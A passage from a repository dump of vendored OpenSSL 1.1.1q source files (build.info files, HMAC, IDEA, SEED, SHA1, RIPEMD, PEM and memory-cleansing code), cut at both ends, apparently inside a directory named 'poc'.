"License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef _GNU_SOURCE 11 | # define _GNU_SOURCE 12 | #endif 13 | 14 | #include 15 | #include "internal/cryptlib.h" 16 | 17 | char *ossl_safe_getenv(const char *name) 18 | { 19 | #if defined(__GLIBC__) && defined(__GLIBC_PREREQ) 20 | # if __GLIBC_PREREQ(2, 17) 21 | # define SECURE_GETENV 22 | return secure_getenv(name); 23 | # endif 24 | #endif 25 | 26 | #ifndef SECURE_GETENV 27 | if (OPENSSL_issetugid()) 28 | return NULL; 29 | return getenv(name); 30 | #endif 31 | } 32 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/hmac/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | hmac.c hm_ameth.c hm_pmeth.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/hmac/hmac_local.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2020 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_CRYPTO_HMAC_LOCAL_H 11 | # define OSSL_CRYPTO_HMAC_LOCAL_H 12 | 13 | /* The current largest case is for SHA3-224 */ 14 | #define HMAC_MAX_MD_CBLOCK_SIZE 144 15 | 16 | struct hmac_ctx_st { 17 | const EVP_MD *md; 18 | EVP_MD_CTX *md_ctx; 19 | EVP_MD_CTX *i_ctx; 20 | EVP_MD_CTX *o_ctx; 21 | }; 22 | 23 | #endif 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/idea/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | i_cbc.c i_cfb64.c i_ofb64.c i_ecb.c i_skey.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/idea/i_ecb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "idea_local.h" 12 | #include 13 | 14 | const char *IDEA_options(void) 15 | { 16 | return "idea(int)"; 17 | } 18 | 19 | void IDEA_ecb_encrypt(const unsigned char *in, unsigned char *out, 20 | IDEA_KEY_SCHEDULE *ks) 21 | { 22 | unsigned long l0, l1, d[2]; 23 | 24 | n2l(in, l0); 25 | d[0] = l0; 26 | n2l(in, l1); 27 | d[1] = l1; 28 | IDEA_encrypt(d, ks); 29 | l0 = d[0]; 30 | l2n(l0, out); 31 | l1 = d[1]; 32 | l2n(l1, out); 33 | l0 = l1 = d[0] = d[1] = 0; 34 | } 35 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/kdf/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | tls1_prf.c kdf_err.c hkdf.c scrypt.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/lhash/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | lhash.c lh_stats.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/md2/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | md2_dgst.c md2_one.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/md4/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | md4_dgst.c md4_one.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/md5/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | md5_dgst.c md5_one.c {- $target{md5_asm_src} -} 4 | 5 | GENERATE[md5-586.s]=asm/md5-586.pl \ 6 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) 7 | 8 | GENERATE[md5-x86_64.s]=asm/md5-x86_64.pl $(PERLASM_SCHEME) 9 | 10 | GENERATE[md5-sparcv9.S]=asm/md5-sparcv9.pl $(PERLASM_SCHEME) 11 | INCLUDE[md5-sparcv9.o]=.. 12 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/mdc2/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | mdc2dgst.c mdc2_one.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/mdc2/mdc2_one.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "internal/cryptlib.h" 12 | #include 13 | 14 | unsigned char *MDC2(const unsigned char *d, size_t n, unsigned char *md) 15 | { 16 | MDC2_CTX c; 17 | static unsigned char m[MDC2_DIGEST_LENGTH]; 18 | 19 | if (md == NULL) 20 | md = m; 21 | if (!MDC2_Init(&c)) 22 | return NULL; 23 | MDC2_Update(&c, d, n); 24 | MDC2_Final(md, &c); 25 | OPENSSL_cleanse(&c, sizeof(c)); /* security consideration */ 26 | return md; 27 | } 28 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/mem_clr.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2002-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | /* 14 | * Pointer to memset is volatile so that compiler must de-reference 15 | * the pointer and can't assume that it points to any function in 16 | * particular (such as memset, which it then might further "optimize") 17 | */ 18 | typedef void *(*memset_t)(void *, int, size_t); 19 | 20 | static volatile memset_t memset_func = memset; 21 | 22 | void OPENSSL_cleanse(void *ptr, size_t len) 23 | { 24 | memset_func(ptr, 0, len); 25 | } 26 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/o_fips.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2011-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "internal/cryptlib.h" 11 | 12 | int FIPS_mode(void) 13 | { 14 | /* This version of the library does not support FIPS mode. */ 15 | return 0; 16 | } 17 | 18 | int FIPS_mode_set(int r) 19 | { 20 | if (r == 0) 21 | return 1; 22 | CRYPTOerr(CRYPTO_F_FIPS_MODE_SET, CRYPTO_R_FIPS_MODE_NOT_SUPPORTED); 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/o_init.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2011-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include "e_os.h" 11 | #include 12 | 13 | /* 14 | * Perform any essential OpenSSL initialization operations. Currently does 15 | * nothing. 16 | */ 17 | 18 | void OPENSSL_init(void) 19 | { 20 | return; 21 | } 22 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/objects/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | o_names.c obj_dat.c obj_lib.c obj_err.c obj_xref.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/objects/obj_local.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | typedef struct name_funcs_st NAME_FUNCS; 11 | DEFINE_STACK_OF(NAME_FUNCS) 12 | DEFINE_LHASH_OF(OBJ_NAME); 13 | typedef struct added_obj_st ADDED_OBJ; 14 | DEFINE_LHASH_OF(ADDED_OBJ); 15 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ocsp/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | ocsp_asn.c ocsp_ext.c ocsp_ht.c ocsp_lib.c ocsp_cl.c \ 4 | ocsp_srv.c ocsp_prn.c ocsp_vfy.c ocsp_err.c v3_ocsp.c 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/pem/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | pem_sign.c pem_info.c pem_lib.c pem_all.c pem_err.c \ 4 | pem_x509.c pem_xaux.c pem_oth.c pem_pk8.c pem_pkey.c pvkfmt.c 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/pem/pem_x509.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2001-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "internal/cryptlib.h" 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | IMPLEMENT_PEM_rw(X509, X509, PEM_STRING_X509, X509) 19 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/pem/pem_xaux.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2001-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "internal/cryptlib.h" 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | IMPLEMENT_PEM_rw(X509_AUX, X509, PEM_STRING_X509_TRUSTED, X509_AUX) 19 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/pkcs12/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | p12_add.c p12_asn.c p12_attr.c p12_crpt.c p12_crt.c p12_decr.c \ 4 | p12_init.c p12_key.c p12_kiss.c p12_mutl.c p12_sbag.c \ 5 | p12_utl.c p12_npas.c pk12err.c p12_p8d.c p12_p8e.c 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/pkcs12/p12_p8d.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2001-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "internal/cryptlib.h" 12 | #include 13 | 14 | PKCS8_PRIV_KEY_INFO *PKCS8_decrypt(const X509_SIG *p8, const char *pass, 15 | int passlen) 16 | { 17 | const X509_ALGOR *dalg; 18 | const ASN1_OCTET_STRING *doct; 19 | X509_SIG_get0(p8, &dalg, &doct); 20 | return PKCS12_item_decrypt_d2i(dalg, 21 | ASN1_ITEM_rptr(PKCS8_PRIV_KEY_INFO), pass, 22 | passlen, doct, 1); 23 | } 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/pkcs7/bio_pk7.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2006-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | #if !defined(OPENSSL_SYS_VXWORKS) 15 | # include 16 | #endif 17 | #include 18 | 19 | /* Streaming encode support for PKCS#7 */ 20 | 21 | BIO *BIO_new_PKCS7(BIO *out, PKCS7 *p7) 22 | { 23 | return BIO_new_NDEF(out, (ASN1_VALUE *)p7, ASN1_ITEM_rptr(PKCS7)); 24 | } 25 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/pkcs7/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | pk7_asn1.c pk7_lib.c pkcs7err.c pk7_doit.c pk7_smime.c pk7_attr.c \ 4 | pk7_mime.c bio_pk7.c 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ppc_arch.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2014-2019 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_CRYPTO_PPC_ARCH_H 11 | # define OSSL_CRYPTO_PPC_ARCH_H 12 | 13 | extern unsigned int OPENSSL_ppccap_P; 14 | 15 | /* 16 | * Flags' usage can appear ambiguous, because they are set rather 17 | * to reflect OpenSSL performance preferences than actual processor 18 | * capabilities. 19 | */ 20 | # define PPC_FPU64 (1<<0) 21 | # define PPC_ALTIVEC (1<<1) 22 | # define PPC_CRYPTO207 (1<<2) 23 | # define PPC_FPU (1<<3) 24 | # define PPC_MADD300 (1<<4) 25 | # define PPC_MFTB (1<<5) 26 | # define PPC_MFSPR268 (1<<6) 27 | 28 | #endif 29 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/rand/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | randfile.c rand_lib.c rand_err.c rand_egd.c \ 4 | rand_win.c rand_unix.c rand_vms.c drbg_lib.c drbg_ctr.c 5 | 6 | INCLUDE[drbg_ctr.o]=../modes 7 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/rc2/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | rc2_ecb.c rc2_skey.c rc2_cbc.c rc2cfb64.c rc2ofb64.c 4 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/rc4/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | {- $target{rc4_asm_src} -} 4 | 5 | GENERATE[rc4-586.s]=asm/rc4-586.pl \ 6 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) $(PROCESSOR) 7 | DEPEND[rc4-586.s]=../perlasm/x86asm.pl 8 | 9 | GENERATE[rc4-x86_64.s]=asm/rc4-x86_64.pl $(PERLASM_SCHEME) 10 | GENERATE[rc4-md5-x86_64.s]=asm/rc4-md5-x86_64.pl $(PERLASM_SCHEME) 11 | 12 | GENERATE[rc4-parisc.s]=asm/rc4-parisc.pl $(PERLASM_SCHEME) 13 | 14 | GENERATE[rc4-s390x.s]=asm/rc4-s390x.pl $(PERLASM_SCHEME) 15 | 16 | BEGINRAW[Makefile] 17 | # GNU make "catch all" 18 | {- $builddir -}/rc4-%.s: {- $sourcedir -}/asm/rc4-%.pl 19 | CC="$(CC)" $(PERL) $< $(PERLASM_SCHEME) $@ 20 | ENDRAW[Makefile] 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/rc4/rc4_local.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1998-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #ifndef OSSL_CRYPTO_RC4_LOCAL_H 11 | # define OSSL_CRYPTO_RC4_LOCAL_H 12 | 13 | # include 14 | # include "internal/cryptlib.h" 15 | 16 | #endif 17 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/rc5/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | rc5_skey.c rc5_ecb.c {- $target{rc5_asm_src} -} rc5cfb64.c rc5ofb64.c 4 | 5 | GENERATE[rc5-586.s]=asm/rc5-586.pl \ 6 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) 7 | DEPEND[rc5-586.s]=../perlasm/x86asm.pl ../perlasm/cbc.pl 8 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/rc5/rc5_ecb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include "rc5_local.h" 12 | #include 13 | 14 | void RC5_32_ecb_encrypt(const unsigned char *in, unsigned char *out, 15 | RC5_32_KEY *ks, int encrypt) 16 | { 17 | unsigned long l, d[2]; 18 | 19 | c2l(in, l); 20 | d[0] = l; 21 | c2l(in, l); 22 | d[1] = l; 23 | if (encrypt) 24 | RC5_32_encrypt(d, ks); 25 | else 26 | RC5_32_decrypt(d, ks); 27 | l = d[0]; 28 | l2c(l, out); 29 | l = d[1]; 30 | l2c(l, out); 31 | l = d[0] = d[1] = 0; 32 | } 33 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ripemd/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | rmd_dgst.c rmd_one.c {- $target{rmd160_asm_src} -} 4 | 5 | GENERATE[rmd-586.s]=asm/rmd-586.pl \ 6 | $(PERLASM_SCHEME) $(LIB_CFLAGS) $(LIB_CPPFLAGS) 7 | DEPEND[rmd-586.s]=../perlasm/x86asm.pl 8 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/ripemd/rmd_one.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | unsigned char *RIPEMD160(const unsigned char *d, size_t n, unsigned char *md) 16 | { 17 | RIPEMD160_CTX c; 18 | static unsigned char m[RIPEMD160_DIGEST_LENGTH]; 19 | 20 | if (md == NULL) 21 | md = m; 22 | if (!RIPEMD160_Init(&c)) 23 | return NULL; 24 | RIPEMD160_Update(&c, d, n); 25 | RIPEMD160_Final(md, &c); 26 | OPENSSL_cleanse(&c, sizeof(c)); /* security consideration */ 27 | return md; 28 | } 29 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/rsa/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | rsa_ossl.c rsa_gen.c rsa_lib.c rsa_sign.c rsa_saos.c rsa_err.c \ 4 | rsa_pk1.c rsa_ssl.c rsa_none.c rsa_oaep.c rsa_chk.c \ 5 | rsa_pss.c rsa_x931.c rsa_asn1.c rsa_depr.c rsa_ameth.c rsa_prn.c \ 6 | rsa_pmeth.c rsa_crpt.c rsa_x931g.c rsa_meth.c rsa_mp.c 7 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/seed/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=seed.c seed_ecb.c seed_cbc.c seed_cfb.c seed_ofb.c 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/seed/seed_cbc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2007-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | void SEED_cbc_encrypt(const unsigned char *in, unsigned char *out, 14 | size_t len, const SEED_KEY_SCHEDULE *ks, 15 | unsigned char ivec[SEED_BLOCK_SIZE], int enc) 16 | { 17 | if (enc) 18 | CRYPTO_cbc128_encrypt(in, out, len, ks, ivec, 19 | (block128_f) SEED_encrypt); 20 | else 21 | CRYPTO_cbc128_decrypt(in, out, len, ks, ivec, 22 | (block128_f) SEED_decrypt); 23 | } 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/seed/seed_cfb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2007-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | void SEED_cfb128_encrypt(const unsigned char *in, unsigned char *out, 14 | size_t len, const SEED_KEY_SCHEDULE *ks, 15 | unsigned char ivec[SEED_BLOCK_SIZE], int *num, 16 | int enc) 17 | { 18 | CRYPTO_cfb128_encrypt(in, out, len, ks, ivec, num, enc, 19 | (block128_f) SEED_encrypt); 20 | } 21 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/seed/seed_ecb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2007-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | 12 | void SEED_ecb_encrypt(const unsigned char *in, unsigned char *out, 13 | const SEED_KEY_SCHEDULE *ks, int enc) 14 | { 15 | if (enc) 16 | SEED_encrypt(in, out, ks); 17 | else 18 | SEED_decrypt(in, out, ks); 19 | } 20 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/seed/seed_ofb.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2007-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | void SEED_ofb128_encrypt(const unsigned char *in, unsigned char *out, 14 | size_t len, const SEED_KEY_SCHEDULE *ks, 15 | unsigned char ivec[SEED_BLOCK_SIZE], int *num) 16 | { 17 | CRYPTO_ofb128_encrypt(in, out, len, ks, ivec, num, 18 | (block128_f) SEED_encrypt); 19 | } 20 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/sha/sha1_one.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | #include 14 | 15 | unsigned char *SHA1(const unsigned char *d, size_t n, unsigned char *md) 16 | { 17 | SHA_CTX c; 18 | static unsigned char m[SHA_DIGEST_LENGTH]; 19 | 20 | if (md == NULL) 21 | md = m; 22 | if (!SHA1_Init(&c)) 23 | return NULL; 24 | SHA1_Update(&c, d, n); 25 | SHA1_Final(md, &c); 26 | OPENSSL_cleanse(&c, sizeof(c)); 27 | return md; 28 | } 29 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/sha/sha1dgst.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 1995-2016 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | #include 11 | #include 12 | 13 | # include 14 | 15 | /* The implementation is in ../md32_common.h */ 16 | 17 | # include "sha_local.h" 18 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/siphash/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | siphash.c \ 4 | siphash_pmeth.c \ 5 | siphash_ameth.c 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/siphash/siphash_local.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2017 The OpenSSL Project Authors. All Rights Reserved. 3 | * 4 | * Licensed under the OpenSSL license (the "License"). You may not use 5 | * this file except in compliance with the License. You can obtain a copy 6 | * in the file LICENSE in the source distribution or at 7 | * https://www.openssl.org/source/license.html 8 | */ 9 | 10 | /* Based on https://131002.net/siphash C reference implementation */ 11 | 12 | struct siphash_st { 13 | uint64_t total_inlen; 14 | uint64_t v0; 15 | uint64_t v1; 16 | uint64_t v2; 17 | uint64_t v3; 18 | unsigned int len; 19 | int hash_size; 20 | int crounds; 21 | int drounds; 22 | unsigned char leavings[SIPHASH_BLOCK_SIZE]; 23 | }; 24 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/sm2/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | sm2_sign.c sm2_crypt.c sm2_err.c sm2_pmeth.c 4 | 5 | 6 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/sm3/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=sm3.c m_sm3.c 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/sm4/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | sm4.c 4 | 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/srp/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=srp_lib.c srp_vfy.c 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/stack/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=stack.c 3 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/store/build.info: -------------------------------------------------------------------------------- 1 | LIBS=../../libcrypto 2 | SOURCE[../../libcrypto]=\ 3 | store_err.c store_init.c store_lib.c store_register.c store_strings.c \ 4 | loader_file.c 5 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/crypto/store/store_init.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2016-2018 The OpenSSL Project 